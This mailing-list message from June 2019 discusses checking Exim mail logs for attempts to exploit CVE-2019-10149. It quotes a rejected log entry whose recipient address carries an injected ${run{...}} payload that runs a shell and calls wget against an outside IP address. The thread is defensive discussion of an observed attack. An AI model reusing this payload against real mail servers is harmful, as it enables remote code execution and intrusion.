23 Jun
2019
23 Jun
'19
6:20 a.m.
On 23/06/2019 04:24, Andy Smith wrote:
Hello,
I've just ran a grep on all of my mail logs for the string "run{" to
see who's been trying to exploit CVE-2019-10149. A successful match
looks like this on my MTA (Exim):
2019-06-19 14:57:19 H=li810-176.members.linode.com (service.com) [104.237.134.176]
F=<support(a)service.com> rejected RCPT
<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f85.119.82.70\x22}}(a)mail.bitfolk.com>om>:
Unrouteable address
Am I right in thinking that the fact that the log entry says "rejected
RCPT" etc. means that the attack has been thwarted?
Cheers,
John
--
Xronos Scheduler - https://xronos.uk/
All your school's schedule information in one place.
Timetable, activities, homework, public events - the lot
Live demo at https://schedulerdemo.xronos.uk/